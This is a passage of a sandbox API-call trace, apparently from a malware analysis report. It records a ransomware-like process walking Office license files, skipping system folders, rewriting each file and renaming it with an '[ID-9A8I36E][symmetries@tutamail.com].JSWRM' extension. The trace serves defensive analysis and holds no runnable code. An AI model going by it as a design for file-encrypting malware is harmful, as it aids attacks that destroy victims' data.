office\\root\\licenses16\\powerpointr_trial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0107.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0107.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0107.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0107.066] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0107.066] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe89c5db2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe89c5db2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8a849ba, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a8e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PowerPointVL_KMS_Client-ppd.xrm-ms", cAlternateFileName="POE633~1.XRM")) returned 1 [0107.066] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ppd.xrm-ms", lpString2=".") returned 1 [0107.066] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ppd.xrm-ms", lpString2="..") returned 1 [0107.066] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ppd.xrm-ms", lpString2="...") returned 1 [0107.066] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ppd.xrm-ms", lpString2="windows") returned -1 [0107.066] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.066] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.066] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.066] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.066] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.066] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.066] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0107.066] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_KMS_Client-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_KMS_Client-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0107.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_KMS_Client-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0107.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_KMS_Client-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d298, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0107.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0107.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0107.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.067] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0107.067] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_kms_client-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.067] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6798) returned 1 [0107.067] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.067] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a80) returned 0x205850 [0107.067] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1a80, lpOverlapped=0x0) returned 1 [0107.072] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.072] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1a80, lpOverlapped=0x0) returned 1 [0107.072] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0107.072] CloseHandle (hObject=0x45c) returned 1 [0107.072] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0107.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0107.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0107.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0107.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0107.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0107.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.073] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_kms_client-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_KMS_Client-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_kms_client-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0107.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0107.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0107.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.074] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe89536b8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe89536b8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8a384f6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d72, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PowerPointVL_KMS_Client-ul-oob.xrm-ms", cAlternateFileName="PO4F8F~1.XRM")) returned 1 [0107.074] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.074] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.074] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.074] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.074] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.074] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.074] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.074] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.074] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.074] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0107.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0107.074] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.074] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22cdc8, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0107.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0107.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0107.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0107.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_KMS_Client-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22ce70, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointVL_KMS_Client-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0107.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0107.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0107.075] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0107.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.075] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0107.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_kms_client-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.075] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11634) returned 1 [0107.075] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.075] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0107.076] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0107.078] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.078] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0107.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.078] CloseHandle (hObject=0x45c) returned 1 [0107.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0107.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.078] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.078] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0107.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0107.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0107.079] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0107.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0107.079] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.079] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_KMS_Client-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_kms_client-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_KMS_Client-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_kms_client-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0107.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0107.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0107.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.080] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe89536b8, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe89536b8, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8b1d316, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x259a, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PowerPointVL_KMS_Client-ul.xrm-ms", cAlternateFileName="POB8E1~1.XRM")) returned 1 [0107.080] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ul.xrm-ms", lpString2=".") returned 1 [0107.080] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ul.xrm-ms", lpString2="..") returned 1 [0107.080] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ul.xrm-ms", lpString2="...") returned 1 [0107.080] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ul.xrm-ms", lpString2="windows") returned -1 [0107.080] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ul.xrm-ms", lpString2="recovery") returned -1 [0107.080] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ul.xrm-ms", lpString2="perflogs") returned 1 [0107.080] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ul.xrm-ms", lpString2="documents and settings") returned 1 [0107.080] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ul.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.080] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ul.xrm-ms", lpString2="system volume information") returned -1 [0107.080] lstrcmpiW (lpString1="PowerPointVL_KMS_Client-ul.xrm-ms", lpString2="msocache") returned 1 [0107.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0107.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_KMS_Client-ul.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0107.080] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_KMS_Client-ul.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0107.080] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0107.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0107.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_KMS_Client-ul.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0107.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointVL_KMS_Client-ul.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d298, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0107.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0107.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0107.081] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0107.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.081] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0107.081] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointvl_kms_client-ul.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.081] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9626) returned 1 [0107.081] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.081] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2590) returned 0x24c1d0 [0107.081] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2590, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2590, lpOverlapped=0x0) returned 1 [0107.085] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.085] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2590, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2590, lpOverlapped=0x0) returned 1 [0107.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.085] CloseHandle (hObject=0x45c) returned 1 [0107.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0107.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.085] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0107.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 